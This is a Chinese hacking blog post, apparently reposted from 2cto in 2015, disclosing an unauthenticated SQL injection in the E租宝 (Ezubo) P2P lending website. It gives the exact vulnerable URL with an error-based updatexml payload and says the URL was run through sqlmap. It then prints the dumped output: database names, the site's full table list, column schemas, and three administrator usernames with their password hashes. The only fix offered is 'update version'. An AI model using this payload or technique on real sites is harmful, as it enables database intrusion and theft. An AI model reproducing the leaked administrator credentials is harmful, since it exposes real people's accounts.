记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

p2p安全之E租宝存在注入漏洞

2015-12-14 21:00

钰诚集团旗下,E租宝官网存在重大漏洞。非登录状态下,可进行SQL注入!

 

1.png



http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)

打开如下:
 

2.png



果断将


http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1*,1,0x22),1)



扔进神器sqlmap
 

3.png

 

available databases [4]:

[*] ezubao_php

[*] information_schema

[*] mysql

[*] performance_schema

Database: ezubao_php

Table: lzh_accounts

[5 columns]

+----------+---------------------+

| Column | Type |

+----------+---------------------+

| id | int(10) unsigned |

| is_final | tinyint(3) unsigned |

| level_id | varchar(12) |

| name | varchar(50) |

| upd_time | timestamp |

+----------+---------------------+

Database: ezubao_php

Table: lzh_ad

[8 columns]

+------------+------------------+

| Column | Type |

+------------+------------------+

| ad_type | tinyint(4) |

| add_time | int(10) |

| content | varchar(5000) |

| end_time | int(10) |

| id | int(10) unsigned |

| start_time | int(10) |

| title | varchar(100) |

| upd_time | timestamp |

+------------+------------------+

Database: ezubao_php

[166 tables]

+-------------------------------+

| lzh_access_count |

| lzh_account_log |

| lzh_account_recharge |

| lzh_accounts |

| lzh_achievements |

| lzh_acl |

| lzh_active |

| lzh_active_level |

| lzh_ad |

| lzh_announcement |

| lzh_app_project_icon |

| lzh_area |

| lzh_article |

| lzh_article_area |

| lzh_article_category |

| lzh_article_category_area |

| lzh_article_notice |

| lzh_auser_dologs |

| lzh_ausers |

| lzh_auth |

| lzh_auto_borrow |

| lzh_baobiao |

| lzh_baobiao_copy |

| lzh_bid_info |

| lzh_borrow_fsf |

| lzh_borrow_info |

| lzh_borrow_info_copy |

| lzh_borrow_info_lock |

| lzh_borrow_investor |

| lzh_borrow_message |

| lzh_borrow_tip |

| lzh_borrow_verify |

| lzh_borrow_vouch |

| lzh_carousel |

| lzh_ceshi_member |

| lzh_ceshi_money |

| lzh_comment |

| lzh_cps |

| lzh_datacenter_sync |

| lzh_debit_credit |

| lzh_debit_credit_init |

| lzh_department |

| lzh_department_changelog |

| lzh_donate |

| lzh_draw_goods |

| lzh_email_log |

| lzh_exp_actor |

| lzh_exp_borrow |

| lzh_exp_interest |

| lzh_exp_invest |

| lzh_exp_money |

| lzh_exp_project |

| lzh_face_apply |

| lzh_feedback |

| lzh_financial_maneger |

| lzh_financial_offline_user |

| lzh_financial_sell_log |

| lzh_finanicial_manager_tmp |

| lzh_fmanager |

| lzh_fmanager_client_log |

| lzh_fmanager_client_static |

| lzh_fmanager_dept_static |

| lzh_fmanager_fmg_static |

| lzh_fmanager_invest_back |

| lzh_fmanager_invest_static |

| lzh_fmanager_log |

| lzh_fmanager_maping |

| lzh_fmanager_messages |

| lzh_fmanager_static |

| lzh_fmanager_status |

| lzh_fmanager_virtual_members |

| lzh_fmaneger_static |

| lzh_friend |

| lzh_global |

| lzh_hetong |

| lzh_inner_msg |

| lzh_interface |

| lzh_invest_credit |

| lzh_invest_detb |

| lzh_investoffline |

| lzh_investor_detail |

| lzh_key_value |

| lzh_leader_phone |

| lzh_lottery_draw |

| lzh_lottery_draw_status |

| lzh_market_address |

| lzh_market_goods |

| lzh_market_jifenlist |

| lzh_market_log |

| lzh_member_apply |

| lzh_member_audit |

| lzh_member_banks |

| lzh_member_borrow_show |

| lzh_member_contact_info |

| lzh_member_creditslog |

| lzh_member_data_info |

| lzh_member_department_info |

| lzh_member_ensure_info |

| lzh_member_financial_info |

| lzh_member_friend |

| lzh_member_house_info |

| lzh_member_info |

| lzh_member_integrallog |

| lzh_member_limitlog |

| lzh_member_login |

| lzh_member_money |

| lzh_member_moneylog |

| lzh_member_msg |

| lzh_member_payonline |

| lzh_member_phonelog |

| lzh_member_phoneshield |

| lzh_member_questionnaire |

| lzh_member_remark |

| lzh_member_safequestion |

| lzh_member_token |

| lzh_member_withdraw |

| lzh_members |

| lzh_members_status |

| lzh_moneylog_property |

| lzh_msg_offcial |

| lzh_msg_phonelog_join |

| lzh_msg_tpl |

| lzh_name_apply |

| lzh_navigation |

| lzh_new_department |

| lzh_pay_banknum |

| lzh_pay_banks |

| lzh_pay_posorder |

| lzh_payreturn_log |

| lzh_person_more |

| lzh_prize |

| lzh_prize_date |

| lzh_push_msg |

| lzh_push_token |

| lzh_qq |

| lzh_recommend_import_log |

| lzh_recommend_log |

| lzh_recommend_logs |

| lzh_red_key |

| lzh_red_packet |

| lzh_red_put |

| lzh_red_putuser |

| lzh_red_userkey |

| lzh_report_total_static |

| lzh_sheet |

| lzh_sms_log |

| lzh_smslog |

| lzh_spring_white_list |

| lzh_stat_accounting |

| lzh_stat_moneylog |

| lzh_sys_tip |

| lzh_tmp_ip |

| lzh_today_reward |

| lzh_transfer_borrow_info |

| lzh_transfer_borrow_info_lock |

| lzh_transfer_borrow_investor |

| lzh_transfer_detail |

| lzh_transfer_investor_detail |

| lzh_twhite |

| lzh_update_version |

| lzh_useredit_log |

| lzh_verify |

| lzh_video_apply |

| lzh_vip_apply |

| table_struct_change |

| think_cache |

+-------------------------------+



select user_name,user_pwd from lzh_ausers [3]:

[*] admin, ab044bb3707a5bb729ce9500ba08b240

[*] jiangjun, 9f2cf1d42d5bf5efc754898ac5a2ecc0

[*] zongchen, ce83ac766dc561d2ae1a206fb0cd0b94

Database: ezubao_php

Table: lzh_ausers

[17 columns]

+----------------+------------------+

| Column | Type |

+----------------+------------------+

| area_id | int(11) |

| area_name | varchar(10) |

| id | int(11) |

| is_ban | int(1) |

| is_kf | int(10) unsigned |

| last_log_ip | varchar(30) |

| last_log_time | int(10) |

| phone | varchar(20) |

| qq | varchar(20) |

| real_name | varchar(20) |

| u_company_flag | smallint(6) |

| u_group_id | smallint(6) |

| upd_time | timestamp |

| user_name | varchar(50) |

| user_pass | varchar(50) |

| user_pwd | varchar(50) |

| user_word | varchar(100) |

+----------------+------------------+

解决方案:

更新版本

 
知识来源: www.2cto.com/Article/201512/453497.html

阅读:135495 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“p2p安全之E租宝存在注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

学习黑客技术,传播黑客文化

推广

工具

标签云